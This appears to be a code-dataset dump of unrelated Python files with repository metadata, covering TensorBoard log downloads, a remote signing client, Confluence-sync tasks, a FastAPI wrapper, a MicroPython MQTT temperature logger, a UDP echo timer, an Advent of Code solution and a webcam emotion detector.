for base_path in base_paths:
size = base_path.split('_')[0]
full_path = os.path.join(GCS_BUCKET, base_path, 'models', size)
download_dir = os.path.join(TENSORBOARD_LOGS_LOCAL, base_path)
if not os.path.exists(download_dir):
os.makedirs(download_dir, exist_ok=True)
print(f'Downloading files from {full_path} to {download_dir}')
for file in tqdm.tqdm(tf.gfile.Glob(os.path.join(full_path,
"events.*"))):
tf.gfile.Copy(file,
os.path.join(download_dir, os.path.basename(file)),
overwrite=False)
else:
print(f'{base_path} logs already download. Delete folder'
f'{download_dir} and run script to download again')
| 38.531915 | 77 | 0.699613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 929 | 0.512976 |
dc0e5e9f0de144528e9e2fd2507b7d3b024c5594 | 1,408 | py | Python | tests/TestPythonLibDir/RemotePkcs1Signer/__init__.py | q351941406/isign-1 | c24ce94fa88f15ebc6cc2dbda6852c6d17094fc6 | [
"Apache-2.0"
]
| 83 | 2019-08-20T09:34:27.000Z | 2022-03-24T13:42:36.000Z | tests/TestPythonLibDir/RemotePkcs1Signer/__init__.py | q351941406/isign-1 | c24ce94fa88f15ebc6cc2dbda6852c6d17094fc6 | [
"Apache-2.0"
]
| 15 | 2019-08-20T06:34:16.000Z | 2020-05-17T21:22:52.000Z | tests/TestPythonLibDir/RemotePkcs1Signer/__init__.py | q351941406/isign-1 | c24ce94fa88f15ebc6cc2dbda6852c6d17094fc6 | [
"Apache-2.0"
]
| 6 | 2020-02-09T09:35:17.000Z | 2022-03-19T18:43:17.000Z | import base64
import requests
class RemotePkcs1Signer(object):
""" Client-side Signer subclass, that calls the Signing Service over HTTP to sign things """
# standard headers for request
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
def __init__(self, host, port, key, algorithm="SIGNATURE_RSA_PKCS1_SHA256", keyfile=None):
"""
:param host: host of the remote HTTP service
:param port: port of the remote HTTP service
:param key: see signing_service.py, in our case we use the hash of the related cert to identify the key
:param algorithm: which algorithm to use
:param keyfile: unused, this is a wart :(
"""
self.endpoint = "http://{}:{}/".format(host, port)
self.key = key
self.algorithm = algorithm
def sign(self, data):
plaintext_base64 = base64.b64encode(data)
plaintext_key = u'0'
payload = {
"key": self.key,
"plaintext": [{
"key": plaintext_key,
"value": plaintext_base64
}],
"algorithm": self.algorithm
}
response = requests.post(self.endpoint,
headers=self.__class__.headers,
json=payload).json()
signature = base64.b64decode(response[u'signature'][plaintext_key])
return signature
| 32.744186 | 106 | 0.599432 | 1,375 | 0.976563 | 0 | 0 | 0 | 0 | 0 | 0 | 572 | 0.40625 |
dc0f94e928edc42769b1d0d49b60f125df3ce1e6 | 4,497 | py | Python | architecture_tool_django/nodes/tasks.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
]
| 1 | 2021-08-13T01:37:29.000Z | 2021-08-13T01:37:29.000Z | architecture_tool_django/nodes/tasks.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
]
| null | null | null | architecture_tool_django/nodes/tasks.py | goldginkgo/architecture_tool_django | e4229c5938a4dd01d0877afa7b93daf68e09283b | [
"MIT"
]
| 1 | 2021-07-19T07:57:54.000Z | 2021-07-19T07:57:54.000Z | import logging
import re
from celery import shared_task
from django.conf import settings
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.template.loader import get_template
from django.urls import reverse
from django.utils import timezone
from architecture_tool_django.utils.confluence_wrapper import (
MyConfluence,
tiny_to_page_id,
)
from .models import Node
logger = logging.getLogger(__name__)
def get_node_attrs(instance):
attributes = {}
schema_properties = instance.nodetype.attribute_schema.schema["properties"]
for key, value in instance.attributeSet.items():
if key in schema_properties:
if "title" in schema_properties[key]:
attributes[schema_properties[key]["title"]] = value
else:
attributes[key] = value
attributes["Domain/Subsystem or Subdomain"] = ""
attributes["Service/Component Responsible"] = instance.attributeSet["name"]
attributes["Contact"] = ""
attributes["Service/Component Status"] = instance.attributeSet["status"]
return attributes
def get_outbound_edges(instance, base_url):
outbound_edges = {}
for edge in instance.outbound_edges.all():
edgetype = edge.edge_type.edgetype
if edgetype not in outbound_edges:
outbound_edges[edgetype] = []
url = base_url + reverse("nodes:node.detail", args=[edge.target.key])
name = edge.target.attributeSet.get("name")
item = f'(<a href="{url}">{edge.target.key}</a>) {name}'
outbound_edges[edgetype].append(item)
return outbound_edges
def get_inbound_edges(instance, base_url):
inbound_edges = {}
for edge in instance.inbound_edges.all():
edgetype = edge.edge_type.edgetype
if edgetype not in inbound_edges:
inbound_edges[edgetype] = []
url = base_url + reverse("nodes:node.detail", args=[edge.source.key])
name = edge.source.attributeSet.get("name")
item = f'(<a href="{url}">{edge.source.key}</a>) {name}'
inbound_edges[edgetype].append(item)
return inbound_edges
def update_confluence(title, context, doc_url):
new_spec = get_template("misc/confluence_page.html").render(context)
tiny = re.sub(r".*\/", "", doc_url)
page_id = tiny_to_page_id(tiny)
confluence = MyConfluence()
# page = confluence.get_page_by_id(page_id, expand="version,body.storage")
# version = int(re.sub(r".*\/", "", r.json()["version"]["_links"]["self"]))
confluence.update_page(
page_id,
title,
new_spec,
parent_id=None,
type="page",
representation="storage",
minor_edit=False,
)
def update_confluence_for_component(nodekey):
instance = get_object_or_404(Node, pk=nodekey)
doc_system = instance.attributeSet.get("primaryDocumentationSystem")
doc_url = instance.attributeSet.get("docupediaPage")
if doc_system != "ARC001" or doc_url == "":
return
base_url = settings.ARCHITECTURE_TOOL_URL
attributes = get_node_attrs(instance)
outbound_edges = get_outbound_edges(instance, base_url)
inbound_edges = get_inbound_edges(instance, base_url)
if "isDomainOf" in outbound_edges:
attributes["Domain/Subsystem or Subdomain"] = outbound_edges["isDomainOf"][0]
if "isResponsibleOf" in outbound_edges:
attributes["Service/Component Responsible"] = outbound_edges["isResponsibleOf"][
0
]
if "isContactOf" in outbound_edges:
attributes["Contact"] = ", ".join(outbound_edges["isContactOf"])
image_url = "https://www.xxx.com"
title = f'({instance.key}) {instance.attributeSet["name"]} ({instance.attributeSet["status"]})'
context = {
"base_url": base_url,
"node": instance,
"attributes": attributes,
"inbound_edges": inbound_edges,
"outbound_edges": outbound_edges,
"image_url": image_url,
}
update_confluence(title, context, doc_url)
@shared_task
def update_component_page_task(nodekey):
update_confluence_for_component(nodekey)
logger.info(f"Task: Page for {nodekey} updated!")
@shared_task
def update_components_page_task():
one_h_ago = timezone.now() - timezone.timedelta(hours=1)
nodes = Node.objects.filter(Q(nodetype="component") & Q(updated__gte=one_h_ago))
for node in nodes:
update_confluence_for_component(node.key)
logger.info("Task: All components updated!")
| 32.824818 | 99 | 0.683344 | 0 | 0 | 0 | 0 | 467 | 0.103847 | 0 | 0 | 957 | 0.212809 |
dc107c520e6be07939c0ec67b42b5fccd394dfb1 | 3,195 | py | Python | crosswalk/views/alias_or_create.py | cofin/django-crosswalk | 349ebbd5676d3ef3ccf889ec3849b2f1cff4be32 | [
"MIT"
]
| 4 | 2019-04-08T23:24:30.000Z | 2021-12-22T16:42:12.000Z | crosswalk/views/alias_or_create.py | cofin/django-crosswalk | 349ebbd5676d3ef3ccf889ec3849b2f1cff4be32 | [
"MIT"
]
| 12 | 2017-12-18T04:27:14.000Z | 2021-06-10T18:05:46.000Z | crosswalk/views/alias_or_create.py | cofin/django-crosswalk | 349ebbd5676d3ef3ccf889ec3849b2f1cff4be32 | [
"MIT"
]
| 3 | 2019-08-12T14:36:04.000Z | 2020-10-17T20:54:09.000Z | from crosswalk.authentication import AuthenticatedView
from crosswalk.models import Domain, Entity
from crosswalk.serializers import EntitySerializer
from crosswalk.utils import import_class
from django.core.exceptions import ObjectDoesNotExist
from rest_framework import status
from rest_framework.response import Response
class AliasOrCreate(AuthenticatedView):
def post(self, request, domain):
"""
Create an alias if an entity is found above a certain match threshold
or create a new entity.
"""
user = request.user
data = request.data.copy()
query_field = data.get("query_field")
query_value = data.get("query_value")
block_attrs = data.get("block_attrs", {})
create_attrs = data.get("create_attrs", {})
return_canonical = data.get("return_canonical", True)
threshold = data.get("threshold")
scorer_class = data.get("scorer", "fuzzywuzzy.default_process")
try:
scorer = import_class("crosswalk.scorers.{}".format(scorer_class))
except ImportError:
return Response(
"Invalid scorer.", status=status.HTTP_400_BAD_REQUEST
)
try:
domain = Domain.objects.get(slug=domain)
except ObjectDoesNotExist:
return Response(
"Domain not found.", status=status.HTTP_404_NOT_FOUND
)
# Find the best match for a query
entities = Entity.objects.filter(domain=domain)
entities = entities.filter(attributes__contains=block_attrs)
entity_values = [e.attributes[query_field] for e in entities]
match, score = scorer(query_value, entity_values)
entities = entities.filter(
**{"attributes__{}".format(query_field): match}
)
if entities.count() > 1:
return Response(
"More than one alias candiate for entity.",
status=status.HTTP_403_FORBIDDEN,
)
entity = entities.first()
attributes = {
**{query_field: query_value},
**block_attrs,
**create_attrs,
}
if entity.attributes == attributes:
return Response(
"Entity appears to already exist.",
status=status.HTTP_409_CONFLICT,
)
if score > threshold:
aliased = True
alias = Entity(
attributes=attributes,
alias_for=entity,
created_by=user,
domain=domain,
)
alias.save()
if return_canonical:
while entity.alias_for:
entity = entity.alias_for
else:
aliased = False
entity = Entity(
attributes=attributes, created_by=user, domain=domain
)
entity.save()
return Response(
{
"entity": EntitySerializer(entity).data,
"created": True,
"aliased": aliased,
"match_score": score,
},
status=status.HTTP_200_OK,
)
| 32.272727 | 78 | 0.571831 | 2,868 | 0.897653 | 0 | 0 | 0 | 0 | 0 | 0 | 465 | 0.14554 |
dc10e734b445882a7de1ca38ba65c2b849b9fe68 | 3,629 | py | Python | hoist/fastapi_wrapper.py | ZeroIntensity/Hoist | 08388af0328f225fc3066cf09b8043c30cb900e3 | [
"MIT"
]
| null | null | null | hoist/fastapi_wrapper.py | ZeroIntensity/Hoist | 08388af0328f225fc3066cf09b8043c30cb900e3 | [
"MIT"
]
| null | null | null | hoist/fastapi_wrapper.py | ZeroIntensity/Hoist | 08388af0328f225fc3066cf09b8043c30cb900e3 | [
"MIT"
]
| 2 | 2021-07-26T17:10:19.000Z | 2021-09-02T00:13:17.000Z | from fastapi import FastAPI, Response, WebSocket, WebSocketDisconnect
from threading import Thread
from .server import Server
from .errors import HoistExistsError
from .error import Error
from .version import __version__
from .flask_wrapper import HTML
import uvicorn
from typing import List, Callable
from fastapi.responses import HTMLResponse, JSONResponse
class FastAPIWrapper:
"""Wrapper for FastAPI."""
@staticmethod
def make_server(*args, **kwargs) -> FastAPI:
"""Generate a FastAPI server."""
return FastAPI(*args, **kwargs)
def get_response(self, auth: str, tokens: List[str], callback: Callable, arg: str, response: Response) -> dict:
if not auth in tokens:
response.status_code = 401
return {'ERROR': 'unauthorized'}
resp, success = callback(arg)
if isinstance(resp, Error):
response.status_code = resp.code
return {'ERROR': resp.message}
if not success:
response.status_code = 500
return {'ERROR': resp}
else:
return {'RESPONSE': resp}
def add_hoist(self, app: FastAPI, handle_errors: bool = True, auth: list = [""], premade_pages: bool = True) -> FastAPI:
"""Function for setting up hoist on an app."""
if hasattr(app, 'HOIST_INTERNALSERVER'):
raise HoistExistsError('hoist is already set up on app')
app.HOIST_INTERNALSERVER = Server(app, handle_errors)
tokens: List[str] = auth.copy() # to stop collisions
app.HOIST_AUTH = tokens
app.HOIST_WRAPPER = self
@app.exception_handler(422)
def invalid_args(req, exc) -> JSONResponse:
print('a')
return JSONResponse({"ERROR": "Invalid arguments."}, status_code = 400)
@app.post('/hoist/send')
def http_send(msg: str, auth: str, response: Response) -> dict:
return self.get_response(auth, tokens, app.HOIST_INTERNALSERVER._received, msg, response)
if premade_pages:
@app.get('/hoist')
def home_get() -> str:
return HTMLResponse(
HTML.replace('{{ version }}', __version__)
)
@app.post('/hoist')
def hoist_post() -> str:
return {'RESPONSE': f'Version {__version__}'}
return app
@staticmethod
def run_server(app: FastAPI, ip: str, port: int) -> None:
"""Function for running a FastAPI server."""
uvicorn.run(app, host = ip, port = port)
def thread_server(self, app: FastAPI, ip: str, port: int) -> FastAPI:
"""Function for running a flask app with a thread."""
server: Thread = Thread(target = self.run_server, args = (app, ip, port))
server.start()
return app
def add_socket(self, app: FastAPI, route: str) -> None:
"""Function for adding a socket to a FastAPI server."""
@app.websocket(route)
async def ws(websocket: WebSocket, response: Response):
sock = app.HOIST_SOCKETS[route]
for i in sock.connect:
i()
await websocket.accept()
while True:
try:
data = await websocket.receive_text()
resp = self.get_response("", app.HOIST_AUTH, sock._received, data, response)
await websocket.send_json(resp)
except WebSocketDisconnect:
for i in sock.disconnect:
i()
break
| 34.894231 | 124 | 0.58005 | 3,268 | 0.900524 | 0 | 0 | 1,612 | 0.4442 | 589 | 0.162304 | 487 | 0.134197 |
dc110c5732b9e3f42c8a0c8715b260a938e9705c | 4,874 | py | Python | network/mqtt_client/main_mqtt_publisher.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
]
| 3 | 2017-09-03T17:17:44.000Z | 2017-12-10T12:26:46.000Z | network/mqtt_client/main_mqtt_publisher.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
]
| null | null | null | network/mqtt_client/main_mqtt_publisher.py | flashypepo/myMicropython-Examples | b2b63df865b5ad471b351ca5f279135025859f5d | [
"MIT"
]
| 2 | 2017-10-01T01:10:55.000Z | 2018-07-15T19:49:29.000Z | # This file is executed on every boot (including wake-boot from deepsleep)
# 2017-1210 PePo send timestamp and temperature (Celsius) to MQTT-server on BBB
# 2017-1105 PePo add _isLocal: sensor data to serial port (False) of stored in file (True)
# 2017-0819 PePo add sensor, led and print to serial port
# 2017-0811 PePo updated: no debug, disable webrepl,
# source: https://youtu.be/yGKZOwzGePY - Tony D! MP ESP8266 HTTP examples
print('main.py executing...')
# connect to a personal Wifi network ---------
import wifinetwork as wifi
# TODO: JSON config-file with ssid:ww entry/entries
#wifi.connectTo("PePoDevNet", wifi.readPasswordFrom('pepodevnet.txt'))
print('Wifi: connect to PePoDevNet...')
wifi.connectTo("PePoDevNet")
# set the time from nptime ---------
#print('TODO: get current time from the web...')
print('getting time from the web...')
import nptime
print('... UTC time:', nptime.settime())
#print('\tTODO -local time')
# --- SUMMERTIME or not (=WINTERTIME) ---------------
_isSummerTime = False
print('... Summertime:', _isSummerTime)
# temperature ---------
import class_ds18b20
#get sensor at GPIO14
ds = class_ds18b20.DS18B20(14)
# --- location ---------------
_LOCATION = 'studyroom'
#7-segment display
import tm1637
from machine import Pin
import math
# create tm
tm = tm1637.TM1637(clk=Pin(5), dio=Pin(4))
#print('tm: ', tm)
def display_tm1637(t):
#debug: print('display: temp=', t)
tm.temperature( math.floor(t) )
# helper function: returns temperature-record as string
def temp_record(timestamp, temp):
# timestamp[3] correction for Summertime or not
def _tc(t):
correction = 1
if _isSummerTime:
correction = 2
return t + correction
data = '{0},{1},{2},{3},{4},{5},{6},{7:0.2f}\n'.format(_LOCATION, timestamp[0],timestamp[1],timestamp[2],_tc(timestamp[3]),timestamp[4],timestamp[5],temp)
return data
#''' store data in file temperature.txt
# default: 1 measuremtn per 30 seconds
def saveT2File(dt=30.0):
import time
import utime
print('saveT2File({0}) entered...'.format(dt))
# helper function to add sensor data record to file
def write_record(timestamp, temp):
f = open('temperature.txt', 'a') #append mode
#data = '{0},{1},{2},{3},{4},{5},{6},{7:0.2f}\n'.format(_LOCATION, timestamp[0],timestamp[1],timestamp[2],_tc(timestamp[3]),timestamp[4],timestamp[5],temp)
f.write( temp_record(timestamp, temp) )
f.close()
while True:
#FUTURE: led.on()
timestamp = utime.localtime()
temp = ds.celsius
display_tm1637(temp) #display
write_record(timestamp, temp) #write in file
#FUTURE: led.off()
time.sleep(dt)
# send data to MQTT-server
def send2Server(dt=30.0):
import time
import utime
from umqtt.simple import MQTTClient
#print('send2server({0}) entered...'.format(dt))
#MQTT configuration -----------------
mqtt_server = '192.168.178.40' #ip-address of MQTT-server
TOPIC_TEST = b'topic/test' # topic: debug message
TOPIC_VALUE = b'topic/value' # topic: temperature value
TOPIC = b'topic/temperature' # topic: temp-record
#helper: sends data to MTQQ-server: connect-send payload-disconnet
def sendMQTT(payload, topic=TOPIC, server= mqtt_server):
#print('sendMQTT():', payload)
c = MQTTClient("umqtt_client", server)
c.connect() #success: returns 0
#debug: conn = c.connect()
#print('MQTT connection:', conn)
c.publish(topic, payload)
c.disconnect()
#broadcasting via topic:test
payload = b'MQTT-server: {0},\nTOPIC: {1},\nCollecting temperatures...'.format(mqtt_server, TOPIC) #debug
sendMQTT(payload, TOPIC_TEST)
print(payload)
while True:
timestamp = utime.localtime()
temp = ds.celsius
#print('temperature on display')
display_tm1637(temp)
#print('broadcast temp-record')
payload = temp_record(timestamp, temp)
sendMQTT(payload)
#print('broadcast temp-value')
payload = b'{0}'.format(temp)
sendMQTT(payload, TOPIC_VALUE)
time.sleep(dt)
#main run() - by-default 1 measurement per 30 seconds
def run(dt=30.0):
#store data local (True) or send to server (False)
_isLocal = False;
try:
if _isLocal:
# watch out: file can be very large overtime
saveT2File(dt)
else:
send2Server(dt)
except:
print('collecting temperature data intercepted')
pass
# go ahead and start getting, sending/storing the sensor data
if __name__ == "__main__":
run(60.0) # 1 measurement per minute
| 33.383562 | 164 | 0.622897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,581 | 0.529545 |
dc11cc17aee754089dc4fb18a3e6534b5f45cf92 | 1,724 | py | Python | 2015/07.py | Valokoodari/advent-of-code | c664987f739e0b07ddad34bad87d56768556a5a5 | [
"MIT"
]
| 2 | 2021-12-27T18:59:11.000Z | 2022-01-10T02:31:36.000Z | 2015/07.py | Valokoodari/advent-of-code-2019 | c664987f739e0b07ddad34bad87d56768556a5a5 | [
"MIT"
]
| null | null | null | 2015/07.py | Valokoodari/advent-of-code-2019 | c664987f739e0b07ddad34bad87d56768556a5a5 | [
"MIT"
]
| 2 | 2021-12-23T17:29:10.000Z | 2021-12-24T03:21:49.000Z | #!/usr/bin/python3
lines = open("inputs/07.in", "r").readlines()
for i,line in enumerate(lines):
lines[i] = line.split("\n")[0]
l = lines.copy();
wires = {}
def func_set(p, i):
if p[0].isdigit():
wires[p[2]] = int(p[0])
lines.pop(i)
elif p[0] in wires.keys():
wires[p[2]] = wires[p[0]]
lines.pop(i)
def func_and(p, i):
if p[0].isdigit() and p[2] in wires.keys():
wires[p[4]] = int(p[0]) & wires[p[2]]
lines.pop(i)
if p[0] in wires.keys() and p[2] in wires.keys():
wires[p[4]] = wires[p[0]] & wires[p[2]]
lines.pop(i)
def func_or(p, i):
if p[0] in wires.keys() and p[2] in wires.keys():
wires[p[4]] = wires[p[0]] | wires[p[2]]
lines.pop(i)
def func_rshift(p, i):
if p[0] in wires.keys():
wires[p[4]] = wires[p[0]] >> int(p[2])
lines.pop(i)
def func_lshift(p, i):
if p[0] in wires.keys():
wires[p[4]] = wires[p[0]] << int(p[2])
lines.pop(i)
def func_not(p, i):
if p[1] in wires.keys():
wires[p[3]] = 65535 - wires[p[1]]
lines.pop(i)
def run():
i = 0
while len(lines) > 0:
parts = lines[i].split(" ")
if "AND" in parts:
func_and(parts, i)
elif "NOT" in parts:
func_not(parts, i)
elif "RSHIFT" in parts:
func_rshift(parts, i)
elif "LSHIFT" in parts:
func_lshift(parts, i)
elif "OR" in parts:
func_or(parts, i)
else:
func_set(parts, i)
i += 1
if i >= len(lines):
i = 0
run()
print("Part 1: " + str(wires["a"]))
lines = l
wires = {"b": wires["a"]}
run()
print("Part 2: " + str(wires["a"]))
| 23.297297 | 53 | 0.487239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 104 | 0.060325 |
dc1360cdb290733689a5e8387a3d39ce467c6a9c | 1,659 | py | Python | soccer_embedded/Development/Ethernet/lwip-rtos-config/test_udp_echo.py | ghsecuritylab/soccer_ws | 60600fb826c06362182ebff00f3031e87ac45f7c | [
"BSD-3-Clause"
]
| 56 | 2016-12-25T22:29:00.000Z | 2022-01-06T04:42:00.000Z | soccer_embedded/Development/Ethernet/lwip-rtos-config/test_udp_echo.py | ghsecuritylab/soccer_ws | 60600fb826c06362182ebff00f3031e87ac45f7c | [
"BSD-3-Clause"
]
| 244 | 2021-04-05T03:22:25.000Z | 2022-03-31T16:47:36.000Z | soccer_embedded/Development/Ethernet/lwip-rtos-config/test_udp_echo.py | ghsecuritylab/soccer_ws | 60600fb826c06362182ebff00f3031e87ac45f7c | [
"BSD-3-Clause"
]
| 7 | 2017-01-24T23:38:07.000Z | 2022-01-19T16:58:08.000Z | import socket
import time
import numpy
# This script sends a message to the board, at IP address and port given by
# server_address, using User Datagram Protocol (UDP). The board should be
# programmed to echo back UDP packets sent to it. The time taken for num_samples
# echoes is measured.
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.0.59', 7)
sock.bind(('', 7))
message = 'this is a message of length 80 chars. asdfghjklasdfghjklasdfghjklasdfghjkl ++++'.encode()
num_samples = 500
times = []
try:
# Send data
print('Sending "{}"'.format(message))
print('Measuring time taken for {} echoes'.format(num_samples))
total_time = 0
for i in range(num_samples):
t0 = time.perf_counter()
sent = sock.sendto(message, server_address)
# Receive response
data, server = sock.recvfrom(4096)
t1 = time.perf_counter()
dt = t1 - t0
total_time += dt
#print('received "{}"'.format(data))
times.append(dt)
f = open('times', 'a')
try:
f.write('\n')
for i in range(num_samples):
f.write('{},'.format(times[i]))
finally:
f.close()
times_array = numpy.array(times)
print('Took {} seconds for {} samples'.format(total_time, num_samples))
print('Average echo time: {} seconds'.format(numpy.average(times_array)))
print('Standard deviation: {} seconds'.format(numpy.std(times_array)))
print('Maximum: {} seconds, Minimum: {} seconds'.format(numpy.amax(times_array), numpy.amin(times_array)))
finally:
print('Closing socket')
sock.close()
| 27.65 | 110 | 0.650995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 654 | 0.394213 |
dc140fb927ee173544f8803200f7806b0546c054 | 16,058 | py | Python | test.py | keke185321/emotions | f7cef86c20880b99469c9a35b071d6062e56ac40 | [
"MIT"
]
| 58 | 2017-04-04T18:59:36.000Z | 2022-02-16T14:54:09.000Z | test.py | keke185321/emotions | f7cef86c20880b99469c9a35b071d6062e56ac40 | [
"MIT"
]
| 4 | 2017-06-28T13:56:04.000Z | 2021-07-02T03:42:21.000Z | test.py | keke185321/emotions | f7cef86c20880b99469c9a35b071d6062e56ac40 | [
"MIT"
]
| 26 | 2017-08-22T14:41:28.000Z | 2022-03-08T05:41:03.000Z | #!/usr/bin/env python
#
# This file is part of the Emotions project. The complete source code is
# available at https://github.com/luigivieira/emotions.
#
# Copyright (c) 2016-2017, Luiz Carlos Vieira (http://www.luiz.vieira.nom.br)
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import argparse
import cv2
import numpy as np
from collections import OrderedDict
from datetime import datetime, timedelta
from faces import FaceDetector
from data import FaceData
from gabor import GaborBank
from emotions import EmotionsDetector
#---------------------------------------------
class VideoData:
"""
Helper class to present the detected face region, landmarks and emotions.
"""
#-----------------------------------------
def __init__(self):
"""
Class constructor.
"""
self._faceDet = FaceDetector()
'''
The instance of the face detector.
'''
self._bank = GaborBank()
'''
The instance of the bank of Gabor filters.
'''
self._emotionsDet = EmotionsDetector()
'''
The instance of the emotions detector.
'''
self._face = FaceData()
'''
Data of the last face detected.
'''
self._emotions = OrderedDict()
'''
Data of the last emotions detected.
'''
#-----------------------------------------
def detect(self, frame):
"""
Detects a face and the prototypic emotions on the given frame image.
Parameters
----------
frame: numpy.ndarray
Image where to perform the detections from.
Returns
-------
ret: bool
Indication of success or failure.
"""
ret, face = self._faceDet.detect(frame)
if ret:
self._face = face
# Crop just the face region
frame, face = face.crop(frame)
# Filter it with the Gabor bank
responses = self._bank.filter(frame)
# Detect the prototypic emotions based on the filter responses
self._emotions = self._emotionsDet.detect(face, responses)
return True
else:
self._face = None
return False
#-----------------------------------------
def draw(self, frame):
"""
Draws the detected data of the given frame image.
Parameters
----------
frame: numpy.ndarray
Image where to draw the information to.
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.5
thick = 1
glow = 3 * thick
# Color settings
black = (0, 0, 0)
white = (255, 255, 255)
yellow = (0, 255, 255)
red = (0, 0, 255)
empty = True
# Plot the face landmarks and face distance
x = 5
y = 0
w = int(frame.shape[1]* 0.2)
try:
face = self._face
empty = face.isEmpty()
face.draw(frame)
except:
pass
# Plot the emotion probabilities
try:
emotions = self._emotions
if empty:
labels = []
values = []
else:
labels = list(emotions.keys())
values = list(emotions.values())
bigger = labels[values.index(max(values))]
# Draw the header
text = 'emotions'
size, _ = cv2.getTextSize(text, font, scale, thick)
y += size[1] + 20
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
y += 5
cv2.line(frame, (x,y), (x+w,y), black, 1)
size, _ = cv2.getTextSize('happiness', font, scale, thick)
t = size[0] + 20
w = 150
h = size[1]
for l, v in zip(labels, values):
lab = '{}:'.format(l)
val = '{:.2f}'.format(v)
size, _ = cv2.getTextSize(l, font, scale, thick)
# Set a red color for the emotion with bigger probability
color = red if l == bigger else yellow
y += size[1] + 15
p1 = (x+t, y-size[1]-5)
p2 = (x+t+w, y-size[1]+h+5)
cv2.rectangle(frame, p1, p2, black, 1)
# Draw the filled rectangle proportional to the probability
p2 = (p1[0] + int((p2[0] - p1[0]) * v), p2[1])
cv2.rectangle(frame, p1, p2, color, -1)
cv2.rectangle(frame, p1, p2, black, 1)
# Draw the emotion label
cv2.putText(frame, lab, (x, y), font, scale, black, glow)
cv2.putText(frame, lab, (x, y), font, scale, color, thick)
# Draw the value of the emotion probability
cv2.putText(frame, val, (x+t+5, y), font, scale, black, glow)
cv2.putText(frame, val, (x+t+5, y), font, scale, white, thick)
except Exception as e:
print(e)
pass
#---------------------------------------------
def main(argv):
"""
Main entry of this script.
Parameters
------
argv: list of str
Arguments received from the command line.
"""
# Parse the command line
args = parseCommandLine(argv)
# Loads the video or starts the webcam
if args.source == 'cam':
video = cv2.VideoCapture(args.id)
if not video.isOpened():
print('Error opening webcam of id {}'.format(args.id))
sys.exit(-1)
fps = 0
frameCount = 0
sourceName = 'Webcam #{}'.format(args.id)
else:
video = cv2.VideoCapture(args.file)
if not video.isOpened():
print('Error opening video file {}'.format(args.file))
sys.exit(-1)
fps = int(video.get(cv2.CAP_PROP_FPS))
frameCount = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
sourceName = args.file
# Force HD resolution (if the video was not recorded in this resolution or
# if the camera does not support it, the frames will be stretched to fit it)
# The intention is just to standardize the input (and make the help window
# work as intended)
video.set(cv2.CAP_PROP_FRAME_WIDTH, 1280);
video.set(cv2.CAP_PROP_FRAME_HEIGHT, 720);
# Create the helper class
data = VideoData()
# Text settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 1
thick = 1
glow = 3 * thick
# Color settings
color = (255, 255, 255)
paused = False
frameNum = 0
# Process the video input
while True:
if not paused:
start = datetime.now()
ret, img = video.read()
if ret:
frame = img.copy()
else:
paused = True
drawInfo(frame, frameNum, frameCount, paused, fps, args.source)
data.detect(frame)
data.draw(frame)
cv2.imshow(sourceName, frame)
if paused:
key = cv2.waitKey(0)
else:
end = datetime.now()
delta = (end - start)
if fps != 0:
delay = int(max(1, ((1 / fps) - delta.total_seconds()) * 1000))
else:
delay = 1
key = cv2.waitKey(delay)
if key == ord('q') or key == ord('Q') or key == 27:
break
elif key == ord('p') or key == ord('P'):
paused = not paused
elif args.source == 'video' and (key == ord('r') or key == ord('R')):
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and paused and key == 2424832: # Left key
frameNum -= 1
if frameNum < 0:
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and paused and key == 2555904: # Right key
frameNum += 1
if frameNum >= frameCount:
frameNum = frameCount - 1
elif args.source == 'video' and key == 2162688: # Pageup key
frameNum -= (fps * 10)
if frameNum < 0:
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and key == 2228224: # Pagedown key
frameNum += (fps * 10)
if frameNum >= frameCount:
frameNum = frameCount - 1
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif key == 7340032: # F1
showHelp(sourceName, frame.shape)
if not paused:
frameNum += 1
video.release()
cv2.destroyAllWindows()
#---------------------------------------------
def drawInfo(frame, frameNum, frameCount, paused, fps, source):
"""
Draws text info related to the given frame number into the frame image.
Parameters
----------
image: numpy.ndarray
Image data where to draw the text info.
frameNum: int
Number of the frame of which to drawn the text info.
frameCount: int
Number total of frames in the video.
paused: bool
Indication if the video is paused or not.
fps: int
